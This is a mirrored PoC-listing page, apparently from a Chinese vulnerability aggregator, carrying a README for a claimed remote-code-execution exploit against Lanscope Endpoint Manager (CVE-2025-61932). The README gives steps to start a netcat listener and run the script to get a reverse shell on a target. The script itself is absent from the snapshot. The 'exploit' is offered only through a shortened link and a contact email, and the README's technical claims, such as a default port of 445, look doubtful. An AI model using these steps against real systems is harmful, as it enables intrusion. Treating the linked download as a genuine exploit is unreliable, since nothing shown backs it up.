POC详情: 98577a1e63ee1cee1de920d29c670b30fc167039

来源
关联漏洞
标题: MOTEX Lanscope Endpoint Manager 安全漏洞 (CVE-2025-61932)
描述:MOTEX Lanscope Endpoint Manager是日本MOTEX公司的一款企业终端安全与资产管理系统。 MOTEX Lanscope Endpoint Manager (On-Premises)存在安全漏洞,该漏洞源于未正确验证传入请求来源,可能导致执行任意代码。
介绍
# Lanscope Endpoint Manager RCE Exploit (CVE-2025-61932)

## Overview
CVE-2025-61932 is a critical unauthenticated remote code execution (RCE) vulnerability in Lanscope Endpoint Manager On-Premises, specifically the Client program (MR) and Detection Agent (DA) components. The flaw lies in the improper validation of incoming network packets, allowing attackers to craft malicious packets that trigger a buffer overflow in the service’s request handling logic. This results in arbitrary code execution with SYSTEM privileges on Windows or root privileges on Linux, depending on the deployment.

The vulnerability originates in the network listener service, which operates on TCP ports 445 (default), 135, or user-configured ports. The service fails to verify the source of incoming packets, assuming they originate from trusted endpoints. By spoofing headers to mimic legitimate agent communication, attackers can inject malicious payloads into the input buffer of the MR or DA module, leading to memory corruption and code execution.

## Requirements
- Python 3.8+
- Scapy library.
- Target IP and port.

## Usage
1. Install dependencies: `pip install scapy`
2. Vulnerability Check: `python cve-2025-61932.py --target 192.168.1.100 --check`
3. Set up a listener to receive the reverse shell: `nc -lvnp 4444`
4. Run: `python cve-2025-61932.py --target <IP> --port 445 --lhost <YOUR_IP> --lport 4444`

## Disclaimer
This is for authorized testing only. Use at your own risk. Not responsible for misuse.

## Exploit
[href](https://tinyurl.com/2jxd2uww)

For any inquiries, please email me at: anthonmullins@op.pl
文件快照

[4.0K] /data/pocs/98577a1e63ee1cee1de920d29c670b30fc167039 └── [1.6K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。